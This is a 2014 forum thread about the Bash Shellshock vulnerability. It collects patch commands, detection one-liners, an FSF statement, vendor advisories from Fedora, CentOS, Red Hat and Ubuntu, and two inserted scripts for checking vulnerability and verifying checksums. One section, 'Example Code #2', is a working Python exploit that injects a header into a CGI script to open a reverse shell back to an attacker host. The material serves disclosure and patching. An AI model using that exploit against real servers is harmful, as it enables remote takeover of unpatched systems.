Bash security issue "SHELLSHOCK": discovered late September 2014, please update and patch as soon as possible


Type(Type) 2015/1/30 17:40 (Since 2014/9/26 13:16)

Bash Security Bugs: discovered late September 2014, please update and patch as soon as possible

(especially servers running bash-based CGI-BIN services)



Short name: ShellShock (naturally, it got a name just like HeartBleed)

ShellShock impact: all Unix/Linux/BSD/MacOS/Windows systems that use bash are affected


Bash versions affected by ShellShock:
=> bash 1.14 ~ bash 4.3 (close to a zero-day bug)


References:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/666

Patching is simple:
@ Ubuntu / Debian
$ apt-get update;apt-get upgrade
$ apt-get update && apt-get install --only-upgrade bash (update bash only)

@ Fedora/CentOS
$ yum update
$ yum update bash (update bash only)

Of course, "safe" presupposes that nobody has already broken in through this hole.


Scenarios the vulnerability may affect
1. Apache HTTP Servers (mod_cgi and mod_cgid) + Bash CGI scripts
2. Certain DHCP clients
3. OpenSSH server using the "ForceCommand" option
4. Related network services whose call path uses an unpatched bash




Q: How to detect it?

The simplest sample code is the one-liner below. If you see "vulnerable" printed,
and only then "this is a test",
that means your bash has the security bug.

Code:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"




Example Code #2:
Code:

#
# CVE-2014-6271 cgi-bin reverse shell
#
# Sends one GET request whose "test" header carries a function definition followed by
# a command. mod_cgi exports the header as the HTTP_TEST environment variable, and an
# unpatched bash running the CGI script executes the trailing command while importing
# its environment. (Ported from the original Python 2 httplib version.)

import http.client
import sys

if len(sys.argv) < 4:
    print("Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0])
    print("Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0])
    sys.exit(0)

conn = http.client.HTTPConnection(sys.argv[1])
# /dev/tcp/<host>/<port> is bash's built-in TCP redirection; it connects back to the attacker
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
           "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print(res.status, res.reason)
data = res.read()
print(data.decode(errors="replace"))



Example Code #3:
Code:

bug.c:

#include <stdlib.h>

/* system() hands the command to /bin/sh; where that is bash, or bash is otherwise
   in the call path, an unpatched bash imports the crafted TERM variable from the
   environment and runs the command that follows the function body. */
int main(void)
{
    return system("cat bug.c");
}

$ gcc bug.c
$ env TERM='() { :;}; echo vulnerable' ./a.out
vulnerable



Update your Ubuntu/Redhat/Fedora/Debian
Code:

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120 Mar 29  2013 /bin/bash

$ apt-get update

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
  linux-image-virtual
The following packages will be upgraded:
  apt apt-utils bash dbus firefox-locale-en libapt-inst1.4 libapt-pkg4.12
  libdbus-1-3 libnss3 libnss3-1d
10 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 5,421 kB of archives.
After this operation, 10.2 kB of additional disk space will be used.
Do you want to continue [Y/n]?


$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash
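Added example, not part of the original post: a small POSIX sh script that automates the one-line check above for both CVE-2014-6271 and the incomplete-fix follow-up CVE-2014-7169 (the CVE the distribution advisories later in this thread are about), and that simulates scenario 1 from the list (mod_cgi handing a request header to a bash CGI script as an HTTP_* environment variable) without a web server. The function names, the throw-away CGI script and the "injected" header value are constructed for the example; it assumes GNU coreutils env/mktemp and a bash binary in PATH (pass another path as the first argument to test a different build).

```shell
#!/bin/sh
# Local Shellshock checks (added example; not from the original thread).
# Each function takes the bash binary to test as $1 (default: the "bash" in PATH)
# and prints VULNERABLE, PATCHED or NOBASH; exit status 1 means VULNERABLE.

# CVE-2014-6271: an environment variable whose value starts with "() {" is imported as a
# function, and an unpatched bash also executes whatever follows the closing brace.
check_cve_2014_6271() {
    b=${1:-bash}
    command -v "$b" >/dev/null 2>&1 || { echo NOBASH; return 2; }
    out=$(env x='() { :;}; echo vulnerable' "$b" -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo VULNERABLE; return 1 ;;
        *)            echo PATCHED;    return 0 ;;
    esac
}

# CVE-2014-7169: the first fix left parser state behind after the import; this widely
# used check makes an affected bash turn "echo date" into a redirection, creating a
# file named "echo" in the working directory (a throw-away temp dir here).
check_cve_2014_7169() {
    b=${1:-bash}
    command -v "$b" >/dev/null 2>&1 || { echo NOBASH; return 2; }
    d=$(mktemp -d) || return 2
    ( cd "$d" && env X='() { (a)=>\' "$b" -c 'echo date' ) >/dev/null 2>&1
    if [ -e "$d/echo" ]; then r=VULNERABLE; rc=1; else r=PATCHED; rc=0; fi
    rm -rf "$d"
    echo "$r"; return $rc
}

# Scenario 1 from the post: Apache mod_cgi/mod_cgid copies request headers into HTTP_*
# environment variables and then runs the CGI script. Simulate that for a bash CGI
# script: the header value lands in HTTP_USER_AGENT exactly as mod_cgi would set it,
# and the script itself never references the variable at all.
simulate_cgi_request() {
    b=${1:-bash}
    ua=$2
    [ -n "$ua" ] || ua='() { :;}; echo injected'   # constructed attack header
    bpath=$(command -v "$b") || { echo NOBASH; return 2; }
    s=$(mktemp) || return 2
    # constructed minimal CGI script; a real one is no different for this purpose
    printf 'echo "Content-type: text/plain"\necho\necho "hello from cgi"\n' > "$s"
    out=$(env -i PATH="$PATH" HTTP_USER_AGENT="$ua" "$bpath" "$s" 2>/dev/null)
    rm -f "$s"
    case "$out" in
        *injected*) echo VULNERABLE; return 1 ;;
        *)          echo PATCHED;    return 0 ;;
    esac
}

# Run all three against the bash in PATH when executed directly.
for check in check_cve_2014_6271 check_cve_2014_7169 simulate_cgi_request; do
    printf '%-22s %s\n' "$check" "$($check bash)"
done
```

A bash that only carries the first patch passes the 6271 check and still fails the 7169 one, which is why both are run; on a box with several bash builds (a chroot, a container image, a statically linked copy shipped with an appliance) run the script once per binary rather than trusting the package version of /bin/bash.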

Type(Type) 2014/9/27 11:56

The Free Software Foundation's statement on the GNU Bash "ShellShock" vulnerability



Original: http://www.fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability

Quick translated summary:

1. A major security problem has been discovered in GNU Bash. A temporary fix is already available, and a complete fix is being worked on.
All systems that use bash should update immediately and monitor bash-related network services.

2. The bug is commonly called "ShellShock". Under certain conditions it lets an attacker obtain root privileges, either directly through bash
or through (network) applications that have bash in their call path.
See the NVD:
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169

3. Because GNU Bash is free software and reliable and useful, ShellShock's impact is widespread.
Fortunately, because it is GPL v3, free software developers such as
Red Hat could respond to the bug quickly and share the patch so that all major upstream developers could fix it in sync.

4. Everyone is equally free to download, inspect and patch their own bash,
unlike with Microsoft or Apple or other proprietary software.

(The statement also takes a swipe at Microsoft & Apple along the way; I don't know why an official FSF statement has to do that...)

5. Software freedom is one of the preconditions for security: it guarantees that everyone can inspect and test the security of the code they use,
and thereby improve it and produce more secure software.

6. Neither free software nor proprietary software is guaranteed bug-free; bugs happen, and that has nothing to do with the license.
But when a bug is found in free software, everyone has the permission, the power and the source code to reproduce and fix it,
and the patch then quickly spreads, free of charge, to everyone.
This freedom is crucial for secure computing.

7. Proprietary (non-free) software relies on an unjust development model
that hides the source code and strips users of their basic rights; this not only makes security flaws hard to find,
it also makes it easy for vendors to deliberately plant possibly harmful content and to conceal serious problems they have already found.

There have been reports that Microsoft once gave government intelligence agencies information about vulnerabilities that had not yet been fixed.
( http://www.computerworlduk.com/blogs/open-enterprise/how-can-any-company-ever-trust-microsoft-again-3569376/ )

8. Free software does not guarantee your security; in some situations vulnerabilities may be easier to find than in proprietary software.
But compared to "vulnerabilities that are hard to find", continuous scrutiny and improvement of free software is what matters.

9. Most of the development of Bash and other GNU software is contributed by volunteer organizations or individuals giving their talent and time;
we are reviewing Bash's development and looking at whether increased funding for the bash project could prevent similar problems in the future;
if you or your organization use bash and are interested in supporting it, please contact us ( http://www.fsf.org/news/donate@fsf.org )


FSF media contact: John Sullivan, Executive Director
Free Software Foundation +1 (617) 542 5942 campaigns@fsf.org






Type(Type) 2014/9/27 13:41

Fedora Bash Update: Fedora 19, Fedora 20



From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
Date: Fri, 26 Sep 2014 09:00:48 +0000
Message-ID: <20140926090050.9FE1722338@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11514
2014-09-26 08:10:17
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 19
Version : 4.2.48
Release : 2.fc19
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Inhibit code injection - patch by Stephane Chazelas
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
Date: Fri, 26 Sep 2014 09:03:00 +0000
Message-ID: <20140926090302.6FC4121113@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11527
2014-09-26 08:10:45
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 20
Version : 4.2.48
Release : 2.fc20
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-4
- Inhibit code injection - patch by Stephane Chazelas
* Mon Jul 21 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-3
- Mention ulimit -c and -f block size in POSIX mode
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Proper patchlevel 47
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

CentOS 5 / CentOS 6 / CentOS 7


From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 5 bash Security Update
Date: Fri, 26 Sep 2014 02:16:02 +0000
Message-ID: <20140926021602.GA3213@chakra.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
9755e86ad8536c908f95340be308190b52989bfa0d9268a461c40a3f0d493bc7 bash-3.2-33.el5_10.4.i386.rpm

x86_64:
b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c bash-3.2-33.el5_10.4.x86_64.rpm

Source:
b71bd90354d2724f256f9f23e113eea89c98b3ce923380657461cb78d34ab8da bash-3.2-33.el5_10.4.src.rpm



--
Johnny Hughes
CentOS Project { http://www.centos.org/ }
irc: hughesjr, #centos@irc.freenode.net


From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 6 bash Security Update
Date: Fri, 26 Sep 2014 02:24:20 +0000
Message-ID: <20140926022420.GA62097@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
28a674dd09ca395b3021749ebf8928806ae981a325c02b8ead070e75cdae2cab bash-4.1.2-15.el6_5.2.i686.rpm
333f57db85ea63636650d1b491c07a5d0ccb722e9353db5f22a62685d96c9da7 bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
72fb8fa60fce9ccd1f221ace44d7a29870856d9033819d2c3e75885881cf6a4a bash-4.1.2-15.el6_5.2.x86_64.rpm
18cde2ec120c8d351c60ae3901bb6706f4c97abbf2b87cdec5ed1ba4175c84a2 bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Source:
d0a8f52d7db4c729c17188a2bd690aff2371f8ac86900dabb14b0df5aa1ff6a5 bash-4.1.2-15.el6_5.2.src.rpm

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 7 bash Security Update
Date: Fri, 26 Sep 2014 02:23:24 +0000
Message-ID: <20140926022324.GA61885@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

x86_64:
d2806c39117791707b6f528afd2bfa35b20a67f6ad40231057d6dd27f4eb7e36 bash-4.2.45-5.el7_0.4.x86_64.rpm
9a66662961d2a359b71387436b03e1e951473b10dbf450e480c6787d584dc70e bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Source:
b37570f9434b82c9f2df7920b1ab94e00039370b58ee1ab2c2235eeda53b88fb bash-4.2.45-5.el7_0.4.src.rpm


Red Hat v5, Red Hat v6, Red Hat v7 BASH Update



From: bugzilla@redhat.com
To: rhsa-announce@redhat.com, enterprise-watch-list@redhat.com
Subject: [RHSA-2014:1306-01] Important: bash security update
Date: Fri, 26 Sep 2014 02:02:30 +0000
Message-ID: <201409260154.s8Q1s9AP014275@int-mx13.intmail.prod.int.phx2.redhat.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
Red Hat Security Advisory

Synopsis: Important: bash security update
Advisory ID: RHSA-2014:1306-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1306.html

Issue date: 2014-09-26
CVE Names: CVE-2014-7169
=====================================================================

1. Summary:

Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 5, 6, and 7.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh). Bash is the default
shell for Red Hat Enterprise Linux.

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

Applications which directly create bash functions as environment variables
need to be made aware of changes to the way names are handled by this
update. For more information see the Knowledgebase article at
https://access.redhat.com/articles/1200223


Note: Docker users are advised to use "yum update" within their containers,
and to commit the resulting changes.

For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the
aforementioned Knowledgebase article.

All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258


5. Bugs fixed ( https://bugzilla.redhat.com/):

1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for
CVE-2014-6271)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

ia64:
bash-3.2-33.el5_11.4.i386.rpm
bash-3.2-33.el5_11.4.ia64.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.ia64.rpm

ppc:
bash-3.2-33.el5_11.4.ppc.rpm
bash-debuginfo-3.2-33.el5_11.4.ppc.rpm

s390x:
bash-3.2-33.el5_11.4.s390x.rpm
bash-debuginfo-3.2-33.el5_11.4.s390x.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-4.1.2-15.el6_5.2.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-4.1.2-15.el6_5.2.s390x.rpm
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm
bash-doc-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm
bash-doc-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

ppc64:
bash-4.2.45-5.el7_0.4.ppc64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-4.2.45-5.el7_0.4.s390x.rpm
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm
bash-doc-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm
bash-doc-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package


7. References:

https://www.redhat.com/security/data/cve/CVE-2014-7169.html

https://access.redhat.com/security/updates/classification...
https://access.redhat.com/articles/1200223


8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/


Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFUJMc4XlSAg2UNWIIRAsowAKCeLFE4QctUYTBC7bvqd6RTgUMptACcC2jt
wqMN2oFvaGhf5SqiZHqpyOA=
=Unt1
-----END PGP SIGNATURE-----


Ubuntu 10.04 / 12.04 / 14.04 BASH Update


From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-2363-1] Bash vulnerability
Date: Thu, 25 Sep 2014 18:35:21 -0400
Message-ID: <542498A9.6020900@canonical.com>
==========================================================================
Ubuntu Security Notice USN-2363-1
September 25, 2014

bash vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS

Summary:

Bash allowed bypassing environment restrictions in certain environments.

Software Description:
- bash: GNU Bourne Again SHell

Details:

Tavis Ormandy discovered that the security fix for Bash included in
USN-2362-1 was incomplete. An attacker could use this issue to bypass
certain environment restrictions. (CVE-2014-7169)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.2

Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.3

Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.2

In general, a standard system update will make all the necessary changes.

References:
http://www.ubuntu.com/usn/usn-2363-1

CVE-2014-7169

Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.2

https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.3

https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2
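Added example, not part of the announcements quoted above: the CentOS announcements list every package with its sha256sum, and a POSIX sh function like the one below checks files fetched from a mirror against such a list before they are handed to the package manager. The function names, the manifest format (one "<sha256> <filename>" per line, with section labels such as "x86_64:" skipped) and the demo files are constructed for this example; it assumes GNU coreutils sha256sum (or Perl's shasum as a fallback) and mktemp. The bash-3.2-33.el5_10.4.x86_64.rpm hash in the demo is the one from the CentOS 5 announcement above and shows up as MISSING unless that file has actually been downloaded.

```shell
#!/bin/sh
# Verify downloaded packages against an advisory's "(sha256sum Filename)" list
# (added example; not from the original thread).

sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_manifest MANIFEST DIR: prints "OK|MISMATCH|MISSING <file>" for each entry and
# returns 1 if any entry is not OK, so it can gate a local install of the packages.
verify_manifest() {
    manifest=$1; dir=$2; rc=0
    while read -r expected name; do
        # skip blank lines and section labels such as "i386:" or "Source:"
        [ -n "$name" ] || continue
        case "$expected" in *[!0-9a-f]*) continue ;; esac
        [ "${#expected}" -eq 64 ] || continue
        if [ ! -f "$dir/$name" ]; then
            echo "MISSING $name"; rc=1; continue
        fi
        if [ "$(sha256_of "$dir/$name")" = "$expected" ]; then
            echo "OK $name"
        else
            echo "MISMATCH $name"; rc=1
        fi
    done < "$manifest"
    return $rc
}

# Constructed demo: one file that matches its hash, one tampered file, one absent package.
demo_dir=$(mktemp -d)
printf 'hello\n' > "$demo_dir/good.rpm"
printf 'tampered\n' > "$demo_dir/bad.rpm"
cat > "$demo_dir/manifest" <<'EOF'
x86_64:
5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03 good.rpm
5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03 bad.rpm
b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c bash-3.2-33.el5_10.4.x86_64.rpm
EOF
verify_manifest "$demo_dir/manifest" "$demo_dir" || echo "some packages failed verification"
rm -rf "$demo_dir"
```

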